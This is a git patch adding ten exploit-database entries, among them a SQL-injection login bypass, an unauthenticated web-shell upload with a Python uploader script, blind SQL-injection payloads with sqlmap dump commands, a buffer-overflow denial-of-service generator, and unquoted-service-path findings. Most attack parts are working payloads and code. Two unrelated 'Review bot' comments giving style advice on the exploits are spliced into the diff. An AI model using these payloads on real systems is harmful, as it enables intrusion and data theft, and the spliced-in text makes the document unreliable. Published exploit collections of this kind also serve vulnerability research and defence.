From e4f4680368c1c2ff32f7783783ea309d8e4a9a8c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 8 May 2021 05:01:52 +0000
Subject: [PATCH] DB: 2021-05-08
10 changes to exploits/shellcodes
Sandboxie 5.49.7 - Denial of Service (PoC)
Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
Epic Games Rocket League 1.95 - Stack Buffer Overrun
Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
Voting System 1.0 - Authentication Bypass (SQLI)
Voting System 1.0 - Remote Code Execution (Unauthenticated)
Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection
# Date: May 3rd 2021
---
 exploits/multiple/webapps/49837.txt | 2 +-
 exploits/php/webapps/49843.txt | 60 +++++
 exploits/php/webapps/49846.txt | 67 +++++
 exploits/php/webapps/49847.py | 109 ++++++++
 exploits/php/webapps/49849.txt | 40 +++
 exploits/windows/dos/49844.py | 18 ++
 exploits/windows/local/49841.txt | 56 +++++
 exploits/windows/local/49842.txt | 32 +++
 exploits/windows/local/49845.txt | 30 +++
 exploits/windows/local/49848.txt | 378 ++++++++++++++++++++++++++++
 files_exploits.csv | 11 +-
 11 files changed, 801 insertions(+), 2 deletions(-)
 create mode 100644 exploits/php/webapps/49843.txt
 create mode 100644 exploits/php/webapps/49846.txt
 create mode 100755 exploits/php/webapps/49847.py
 create mode 100644 exploits/php/webapps/49849.txt
 create mode 100755 exploits/windows/dos/49844.py
 create mode 100644 exploits/windows/local/49841.txt
 create mode 100644 exploits/windows/local/49842.txt
 create mode 100644 exploits/windows/local/49845.txt
 create mode 100644 exploits/windows/local/49848.txt
diff --git a/exploits/multiple/webapps/49837.txt b/exploits/multiple/webapps/49837.txt
index e293ad1b6..8984b7302 100644
--- a/exploits/multiple/webapps/49837.txt
+++ b/exploits/multiple/webapps/49837.txt @@ -1,6 +1,6 @@ # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 -# Exploit Author: Emircan Baş +# Exploit Author: Emircan Baş # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 diff --git a/exploits/php/webapps/49843.txt b/exploits/php/webapps/49843.txt new file mode 100644 index 000000000..b9ece07cf --- /dev/null +++ b/exploits/php/webapps/49843.txt @@ -0,0 +1,60 @@ +# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) +# Date: 06/05/2021 +# Exploit Author: secure77 +# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB + +You can simply bypass the /admin/login.php with the following sql injection. +All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing + + + +########################### Vulnerable code ############################ +if(isset($_POST['login'])){ + $username = $_POST['username']; + $password = $_POST['password']; + + $sql = "SELECT * FROM admin WHERE username = '$username'"; + $query = $conn->query($sql); + + if($query->num_rows < 1){ + $_SESSION['error'] = 'Cannot find account with the username'; + } + else{ + $row = $query->fetch_assoc(); + echo "DB Password: " . $row['password']; + echo "
"; + echo "
"; + echo "Input Password: " . $password; + if(password_verify($password, $row['password'])){ + echo "Equal"; + $_SESSION['admin'] = $row['id']; + } + else{ + echo "not Equal"; + $_SESSION['error'] = 'Incorrect password'; + } + } + +} +else{ + $_SESSION['error'] = 'Input admin credentials first'; +} + +########################### Payload ############################ +POST /admin/login.php HTTP/1.1 +Host: 192.168.1.1 +DNT: 1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 167 + +login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- - \ No newline at end of file diff --git a/exploits/php/webapps/49846.txt b/exploits/php/webapps/49846.txt new file mode 100644 index 000000000..4ae7fa02a --- /dev/null +++ b/exploits/php/webapps/49846.txt 
@@ -0,0 +1,67 @@ +# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated) +# Date: 07/05/2021 +# Exploit Author: secure77 +# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB + +Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE. +Your upload will be stored at /images/ and is also accessible without authentication. + + + +########################### Vulnerable code ############################ +query($sql)){ + $_SESSION['success'] = 'Candidate added successfully'; + } + else{ + $_SESSION['error'] = $conn->error; + } + + } + else{ + $_SESSION['error'] = 'Fill up add form first'; + } + + header('location: candidates.php'); +?> + +########################### Payload ############################ +POST /admin/candidates_add.php HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 275 +Cache-Control: max-age=0 +Origin: http://192.168.1.1 +Upgrade-Insecure-Requests: 1 +DNT: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.1/admin/candidates.php +Accept-Encoding: gzip, deflate +Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +------WebKitFormBoundaryrmynB2CmGO6vwFpO +Content-Disposition: form-data; name="photo"; filename="shell.php" +Content-Type: application/octet-stream + + + +------WebKitFormBoundaryrmynB2CmGO6vwFpO +Content-Disposition: 
form-data; name="add" \ No newline at end of file diff --git a/exploits/php/webapps/49847.py b/exploits/php/webapps/49847.py new file mode 100755 index 000000000..f6c42723e --- /dev/null +++ b/exploits/php/webapps/49847.py @@ -0,0 +1,109 @@ +# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) +# Date: 04-05-2021 +# Exploit Author: Reza Afsahi +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html +# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code +# Version: 0.1 +# Tested on: PHP 7.4.11 , Linux x64_x86 + +############################################################################################################ + +# Description: +# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. + +############################################################################################################ + +# Proof of concept: + +#!/usr/bin/python3 + +import requests +import sys +from bs4 import BeautifulSoup + +def find_shell(domain): + req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php") + soup = BeautifulSoup(req_2.content , "html.parser") + imgs = soup.find_all("img") + for i in imgs: + src = i['src'] + if ("shell.php" in src): + print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n") + break + else: + continue + +def upload_file(domain): + + print("\n [!] Uploading Shell . . .") + payload = """ + + + + Shell + + +
+ +

+ +
+{$result}"; + +?> + + + """ + + h = { + "Content-Type" : "multipart/form-data" + } + + f = {'employee_image':('shell.php',payload, + 'application/x-php', {'Content-Disposition': 'form-data'} + ) + } + d = { + "emplo" : "", + "employee_companyid" : "test", + "employee_firstname" : "test", + "employee_lastname" : "test", + "employee_middlename" : "test", + "branches_datefrom" : "0011-11-11", + "branches_recentdate" : "2222-11-11", + "employee_position" : "test", + "employee_contact" : "23123132132", + "employee_sss" : "test", + "employee_tin" : "test", + "employee_hdmf_pagibig" : "test", + "employee_gsis" : "test" + } + url = domain + "/Admin_Dashboard/process/addemployee_process.php" + req = requests.post(url , data=d , files = f) + if req.status_code == 200: + if ("Insert Successfully" in req.text): + print("\n [!] Shell uploaded succefully\n") + find_shell(domain) + + else: + print("Exploit Failed 1") + +def main(): + if len(sys.argv) != 2: + print('[!] usage: %s ' % sys.argv[0]) + print('[!] eg: %s http://vulndomain.com' % sys.argv[0]) + sys.exit(-1) + + print("<><><><><><><><><><><><><><><><><><><><><><><><>") + print("<> Human Resource Information System <>") + print("<> Shell Uploader <>") + print("<><><><><><><><><><><><><><><><><><><><><><><><>") + target_domain = sys.argv[1] + upload_file(target_domain) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/49849.txt b/exploits/php/webapps/49849.txt new file mode 100644 index 000000000..5449c5709 --- /dev/null +++ b/exploits/php/webapps/49849.txt 
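Review bot: The `h` dict built in `upload_file` (a hard-coded `Content-Type: multipart/form-data` header) is never passed to `requests.post`, so it is dead code that misleads a reader into thinking it is in effect; delete it, since requests derives that header, boundary included, from the `files=` argument. In `find_shell` the trailing `else: continue` is redundant inside a `for` loop, and the `#!/usr/bin/python3` line sits after the comment header, where a shebang is not honoured. The header block lists no requirements although the script depends on the third-party `bs4` package as well as `requests`; a `# Requirements: requests, beautifulsoup4` line would save the next reader a failed import. The embedded PHP payload string appears to have lost its markup in this rendering, so that part of the hunk was not reviewed.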
@@ -0,0 +1,40 @@
+# Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection
+# Date: 03.05.2021
+# Exploit Author: Tyler Butler
+# Vendor Homepage: http://timeclock.sourceforge.net
+# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
+# Version: 1.04
+# Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5
+
+
+Description: PHP Timeclock is vulnerable to both Boolean and Time Based SQL Injection on login.php via the login_userid parameter. This PoC shows how SQLmap can be used to exploit this vulnerability to dump database contents
+
+Boolean Based Payload: user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass
+Time Based Payload: user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass
+
+
+Steps to reproduce:
+ 1. Run sqlmap against a instance of PHP Timeclock
+ 2. Follow the instructions below for specific versions of MySQL
+
+
+MySQL >= 5.0.12:
+
+$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --dbms=MySQL --technique=TB --current-db
+---
+Parameter: login_userid (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: login_userid=user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass
+---
+
+
+MySQL < 5: On versions using MySQL < 5, table names must be included as arguments as information_schema was not introduced into MySQL yet.
+
+$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --technique=B -D timeclock -T employees, -C empfullname --dump --dbms=MySQL -v
+---
+Parameter: login_userid (POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: login_userid=user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass
+---
\ No newline at end of file
diff --git a/exploits/windows/dos/49844.py b/exploits/windows/dos/49844.py
new file mode 100755
index 000000000..8ae3b1fcd
--- /dev/null
+++ b/exploits/windows/dos/49844.py
@@ -0,0 +1,18 @@
+# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
+# Date: 06/05/2021
+# Author: Erick Galindo
+# Vendor Homepage: https://sandboxie-plus.com/
+# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
+# Version: 5.49.7
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Sandboxie Control->Sandbox->Set Container Folder
+#3.- Paste the buffer in the input then press ok
+
+buffer = "\x41" * 5000
+
+f = open ("Sandboxie10.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49841.txt b/exploits/windows/local/49841.txt
new file mode 100644
index 000000000..1ae4789b4
--- /dev/null
+++ b/exploits/windows/local/49841.txt
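Review bot: The PoC step `#1.- Copy printed "AAAAA..." string to clipboard!` in 49844.py does not match the code, which prints nothing and instead writes the buffer to `Sandboxie10.txt`; reword it to `#1.- Open the generated Sandboxie10.txt and copy its contents to the clipboard` so the steps describe what the script actually does. The file handle is opened and closed by hand; the idiomatic form is `with open("Sandboxie10.txt", "w") as f:` / `    f.write(buffer)`, which also closes the file if the write raises. `open (` carries a stray space before the parenthesis.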
@@ -0,0 +1,56 @@
+# Exploit Title: Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
+# Date: 04.05.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.epicgames.com https://www.easy.ac
+
+Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation
+
+
+Vendor: Epic Games, Inc.
+Product web page: https://www.epicgames.com
+ https://www.easy.ac
+Affected version: 4.0.0.0
+
+Summary: Easy Anti-Cheat is the industry-leading anti–cheat service,
+countering hacking and cheating in multiplayer PC games through the
+use of hybrid anti–cheat mechanisms.
+
+Desc: The application suffers from an unquoted search path issue impacting
+the service 'EasyAntiCheat' for Windows deployed as part of Easy Anti-Cheat
+Service application. This could potentially allow an authorized but non-privileged
+local user to execute arbitrary code with elevated privileges on the system.
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
+
+Tested on: Microsoft Windows 10
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5652
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5652.php
+
+
+04.05.2021
+
+--
+
+
+C:\Users>sc qc EasyAntiCheat
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: EasyAntiCheat
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : EasyAntiCheat
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49842.txt b/exploits/windows/local/49842.txt
new file mode 100644
index 000000000..f02cb4f17
--- /dev/null
+++ b/exploits/windows/local/49842.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
+# Discovery by: Erick Galindo
+# Discovery Date: 2020-05-06
+# Vendor Homepage: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Plus-x64-v0.7.4.exe
+# Tested Version: 0.7.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+# Step to discover Unquoted Service Path:
+
+C:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Sandboxie Service" | findstr /i /v """
+Sandboxie Service SbieSvc C:\Program Files\Sandboxie-Plus\SbieSvc.exe Auto
+
+# Service info
+
+sc qc "SbieSvc"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SbieSvc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Sandboxie-Plus\SbieSvc.exe
+ GRUPO_ORDEN_CARGA : UIGroup
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Sandboxie Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+#Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49845.txt b/exploits/windows/local/49845.txt
new file mode 100644
index 000000000..e6ecde936
--- /dev/null
+++ b/exploits/windows/local/49845.txt
@@ -0,0 +1,30 @@
+# Exploit Title: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
+# Discovery by: Erick Galindo
+# Discovery Date: 2020-05-06
+# Vendor Homepage: https://www.gearboxcomputers.com/downloads/wifihotspot.exe
+# Tested Version: 1.0.0.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+# Step to discover Unquoted Service Path:
+
+c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+MainService WifiHotSpotSvc C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe Auto
+
+# Service info
+sc qc wifihotspotsvc
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: wifihotspotsvc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : MainService
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49848.txt b/exploits/windows/local/49848.txt
new file mode 100644
index 000000000..544900b2f
--- /dev/null
+++ b/exploits/windows/local/49848.txt
@@ -0,0 +1,378 @@ +# Exploit Title: Epic Games Rocket League 1.95 - Stack Buffer Overrun +# Date: 25.04.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.epicgames.com https://www.rocketleague.com + +Epic Games Rocket League 1.95 (AK::MemoryMgr::GetPoolName) Stack Buffer Overrun + + +Vendor: Epic Games Inc. | Psyonix, LLC +Product web page: https://www.epicgames.com + https://www.psyonix.com + https://www.rocketleague.com +Affected version: <=1.95 + +Summary: Rocket League is a high-powered hybrid of arcade-style soccer +and vehicular mayhem with easy-to-understand controls and fluid, physics-driven +competition. + +Desc: The game suffers from a stack-based buffer overflow vulnerability. The +issue is caused due to a boundary error in the processing of a UPK format file, +which can be exploited to cause a stack buffer overflow when a user crafts the +file with a large array of bytes inserted in the vicinity offset after the magic +header. Successful exploitation could allow execution of arbitrary code on the +affected machine. + +Tested on: Microsoft Windows 10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5651 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5651.php + + +25.04.2021 + +-- + + +Craft location: ..\rocketleague\TAGame\CookedPCConsole +Header: C1 83 2A 9E 64 03 1F 00 + +hat_Headphones_SF.upk: +---------------------- +... +... 
+ModLoad: 00007ff9`99ff0000 00007ff9`9a016000 C:\WINDOWS\system32\ncryptsslp.dll +ModLoad: 00007ff9`32d70000 00007ff9`36a00000 C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_e9f7884f9b4f82b9\igd9dxva64.dll +ModLoad: 00007ff9`315b0000 00007ff9`32d68000 C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvd3dumx.dll +ModLoad: 00000000`00400000 00000000`0041e000 E:\Epic Games\rocketleague\Binaries\Win64\XINPUT1_3.dll +ModLoad: 00007ff9`8dac0000 00007ff9`8db6c000 C:\WINDOWS\SYSTEM32\TextShaping.dll +[0110.33] Log: Timed out while waiting for GPU to catch up. (500 ms) +(62c.1074): Unknown exception - code 00000001 (!!! second chance !!!) +KERNELBASE!RaiseException+0x69: +00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax] +0:024> r +rax=00007ff99feeb925 rbx=0000000000000000 rcx=0000000000000000 +rdx=000000214edfe8b0 rsi=000000214edfef50 rdi=000000214edfe700 +rip=00007ff9a0364b59 rsp=000000214edfef30 rbp=0000000000000000 + r8=000000214edfedb0 r9=0000000000000000 r10=00000000000000c0 +r11=000000214edfee2e r12=0000000000000000 r13=00007ff776205bb0 +r14=00007ff776dab710 r15=000000214edff8a0 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000204 +KERNELBASE!RaiseException+0x69: +00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax] +0:024> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +*** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Epic Games\rocketleague\Binaries\Win64\EOSSDK-Win64-Shipping.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvwgf2umx.dll - +*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\Program Files (x86)\Epic Games\Launcher\Portal\Extras\Overlay\EOSOVH-Win64-Shipping.dll - +GetUrlPageData2 (WinHttp) failed: 12002. + +DUMP_CLASS: 2 +DUMP_QUALIFIER: 0 + +FAULTING_IP: +KERNELBASE!RaiseException+69 +00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax] + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 00007ffed4d64b59 (KERNELBASE!RaiseException+0x0000000000000069) + ExceptionCode: 00000001 + ExceptionFlags: 00000000 +NumberParameters: 0 + +FAULTING_THREAD: 00000490 +DEFAULT_BUCKET_ID: APPLICATION_FAULT +PROCESS_NAME: RocketLeague.exe +ERROR_CODE: (NTSTATUS) 0x1 - STATUS_WAIT_1 +EXCEPTION_CODE: (Win32) 0x1 (1) - Incorrect function. +EXCEPTION_CODE_STR: 1 +WATSON_BKT_PROCSTAMP: 606f6afa +WATSON_BKT_PROCVER: 1.0.10897.0 +PROCESS_VER_PRODUCT: Rocket League +WATSON_BKT_MODULE: KERNELBASE.dll +WATSON_BKT_MODSTAMP: 2f2f77bf +WATSON_BKT_MODOFFSET: 34b59 +WATSON_BKT_MODVER: 10.0.19041.906 +MODULE_VER_PRODUCT: Microsoft® Windows® Operating System +BUILD_VERSION_STRING: 10.0.19041.928 (WinBuild.160101.0800) +MODLIST_WITH_TSCHKSUM_HASH: ac197712fdc57f2bb67f9b17107e5701c93b4362 +MODLIST_SHA1_HASH: 342698e051c108fd7be71346f5d34f8a14c38381 +NTGLOBALFLAG: 0 +PROCESS_BAM_CURRENT_THROTTLED: 0 +PROCESS_BAM_PREVIOUS_THROTTLED: 0 +APPLICATION_VERIFIER_FLAGS: 0 +PRODUCT_TYPE: 1 +SUITE_MASK: 784 +DUMP_TYPE: fe +ANALYSIS_SESSION_HOST: LAB17 +ANALYSIS_SESSION_TIME: 04-25-2021 13:23:34.0003 +ANALYSIS_VERSION: 10.0.16299.91 amd64fre +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n308] + Type: [APPLICATION_FAULT] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [Unspecified] + Frame: [0] + +BUGCHECK_STR: APPLICATION_FAULT +PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT +LAST_CONTROL_TRANSFER: from 00007ff78f1cbf65 to 00007ffed4d64b59 + +STACK_TEXT: +00000089`23dfe910 00007ff7`8f1cbf65 : 00007ff7`9123b710 00000000`000002f8 00007ff7`906e5190 
00000089`23dfea20 : KERNELBASE!RaiseException+0x69 +00000089`23dfe9f0 00007ff7`8f190215 : 00000089`23dff710 00000089`23dff5d0 00000089`23dff710 00007ffe`d72ee25f : RocketLeague!GetOutermost+0x29245 +00000089`23dff250 00007ff7`8f123466 : 00000089`23dff710 00007ff7`906eb668 00000199`6cf33e40 00000089`23dfe828 : RocketLeague!AK::MusicEngine::Term+0xfce95 +00000089`23dff4d0 00007ff7`8f1297f9 : 0000019a`00000001 00000000`00000000 00000089`23dff770 00000199`00000001 : RocketLeague!AK::MusicEngine::Term+0x900e6 +00000089`23dff6d0 00007ff7`8f1d1e40 : 00000000`00000001 00000000`00000001 0000019a`00000000 00000199`6d26ffd0 : RocketLeague!AK::MusicEngine::Term+0x96479 +00000089`23dff850 00007ffe`d6297034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!Scaleform::System::Init+0x11c0 +00000089`23dff880 00007ffe`d7302651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 +00000089`23dff8b0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 + +THREAD_SHA1_HASH_MOD_FUNC: b03d2da27c20caaf2a76cdae45ff251160c76115 +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: ff5c11b082c48239ef2666814fc4e06663a8c892 +THREAD_SHA1_HASH_MOD: 96a23e97d7538141fe1b904de60919531df8b505 + +FOLLOWUP_IP: +RocketLeague!GetOutermost+29245 +00007ff7`8f1cbf65 eb13 jmp RocketLeague!GetOutermost+0x2925a (00007ff7`8f1cbf7a) + +FAULT_INSTR_CODE: 8b4813eb +SYMBOL_STACK_INDEX: 1 +SYMBOL_NAME: rocketleague!GetOutermost+29245 +FOLLOWUP_NAME: MachineOwner +MODULE_NAME: RocketLeague +IMAGE_NAME: RocketLeague.exe +DEBUG_FLR_IMAGE_TIMESTAMP: 606f6afa +STACK_COMMAND: ~24s ; .cxr ; kb +FAILURE_BUCKET_ID: APPLICATION_FAULT_1_RocketLeague.exe!GetOutermost +BUCKET_ID: APPLICATION_FAULT_rocketleague!GetOutermost+29245 +FAILURE_EXCEPTION_CODE: 1 +FAILURE_IMAGE_NAME: RocketLeague.exe +BUCKET_ID_IMAGE_STR: RocketLeague.exe +FAILURE_MODULE_NAME: RocketLeague 
+BUCKET_ID_MODULE_STR: RocketLeague +FAILURE_FUNCTION_NAME: GetOutermost +BUCKET_ID_FUNCTION_STR: GetOutermost +BUCKET_ID_OFFSET: 29245 +BUCKET_ID_MODTIMEDATESTAMP: 606f6afa +BUCKET_ID_MODCHECKSUM: 251425f +BUCKET_ID_MODVER_STR: 1.0.10897.0 +BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_ +FAILURE_PROBLEM_CLASS: APPLICATION_FAULT +FAILURE_SYMBOL_NAME: RocketLeague.exe!GetOutermost +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/RocketLeague.exe/1.0.10897.0/606f6afa/KERNELBASE.dll/10.0.19041.906/2f2f77bf/1/00034b59.htm?Retriage=1 +TARGET_TIME: 2021-04-25T11:23:44.000Z +OSBUILD: 19042 +OSSERVICEPACK: 928 +SERVICEPACK_NUMBER: 0 +OS_REVISION: 0 +OSPLATFORM_TYPE: x64 +OSNAME: Windows 10 +OSEDITION: Windows 10 WinNt SingleUserTS Personal +USER_LCID: 0 +OSBUILD_TIMESTAMP: 2022-01-18 11:29:28 +BUILDDATESTAMP_STR: 160101.0800 +BUILDLAB_STR: WinBuild +BUILDOSVER_STR: 10.0.19041.928 +ANALYSIS_SESSION_ELAPSED_TIME: 795d +ANALYSIS_SOURCE: UM +FAILURE_ID_HASH_STRING: um:application_fault_1_rocketleague.exe!getoutermost +FAILURE_ID_HASH: {ee1c73f7-ce6b-9e4a-8e1b-66937ecee43c} +Followup: MachineOwner +... +... + +(aa0.3818): Unknown exception - code 00000001 (first chance) +(aa0.3818): Unknown exception - code 00000001 (!!! second chance !!!) +KERNELBASE!RaiseException+0x69: +00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax] +0:024> g +[0188.65] Warning: Warning, Detected data corruption [header] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. +[0188.65] Critical: appError called: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' +[0188.65] Critical: Windows GetLastError: The operation completed successfully. (0) +[0188.65] Warning: Warning, Detected data corruption [undershoot] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. 
